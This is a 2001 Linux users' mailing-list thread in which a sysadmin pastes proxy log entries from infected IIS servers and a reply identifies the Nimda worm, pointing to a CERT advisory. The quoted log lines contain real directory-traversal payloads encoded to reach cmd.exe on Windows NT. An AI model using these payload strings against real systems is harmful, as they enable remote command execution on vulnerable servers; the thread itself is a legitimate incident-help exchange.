Re: [plug] WinNT Server Access Problem

[Philip Roy R. Sanchez]

Looks like the new NIMDA worm. go to this site po.

http://www.cert.org/advisories/CA-2001-26.html


----- Original Message -----
From: Arvin V. Carlos <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: Plug Mailing List <[EMAIL PROTECTED]>
Sent: Wednesday, September 19, 2001 10:35 AM
Subject: [plug] WinNT Server Access Problem


>
> We have two NT 4.0 running IIS, suddenly our squid went down because of
> disk space problme, we check our log files and it eats pur disk space
> beacuse of our NT Machines try to resolv this all the time:
>
>
255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd
.exe
> ? - DIRECT/www -
> 1000866350.455      1 208.142.136.115 TCP_MISS/503 1202 GET
> http://www/scripts/.
> .%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.487      1 208.142.136.115 TCP_MISS/503 1168 GET
> http://www/c/winnt/s
> ystem32/cmd.exe? - DIRECT/www -
> 1000866350.496      1 208.142.136.115 TCP_MISS/503 1168 GET
> http://www/d/winnt/s
> ystem32/cmd.exe? - DIRECT/www -
> 1000866350.505      2 208.142.136.115 TCP_MISS/503 1200 GET
> http://www/scripts/.
> .%255c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.514      2 208.142.136.115 TCP_MISS/503 1242 GET
> http://www/_vti_bin/
> ..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.530      1 208.142.136.115 TCP_MISS/503 1242 GET
> http://www/_mem_bin/
> ..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.539      2 208.142.136.115 TCP_MISS/503 1299 GET
> http://www/msadc/..%
>
255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd
.exe
> ? - DIRECT/www -
> 1000866350.548      2 208.142.136.115 TCP_MISS/503 1202 GET
> http://www/scripts/.
> .%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
> 1000866350.557      1 208.142.136.115 TCP_MISS/503 1202 GET
> http://www/scripts/.
> .%c0%2f../winnt/system32/cmd.exe? - DIRECT/www -
>
> anyone can explain this? this is a virus? pls HELP!!!
>
> --
>
============================================================================
===
> Arvin V. Carlos   Office Phone:
> Linux System Administrator   (047)237-6001/237-6002
> Pccomshop Inc.     http://www.pccomshop.com
>
>                   -- Some people are afraid of nothing! --
>
============================================================================
===
>
>
> _
> Philippine Linux Users Group. Web site and archives at
http://plug.linux.org.ph
> To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
>
> To subscribe to the Linux Newbies' List: send "subscribe" in the body to
[EMAIL PROTECTED]
>

_
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]

To subscribe to the Linux Newbies' List: send "subscribe" in the body to 
[EMAIL PROTECTED]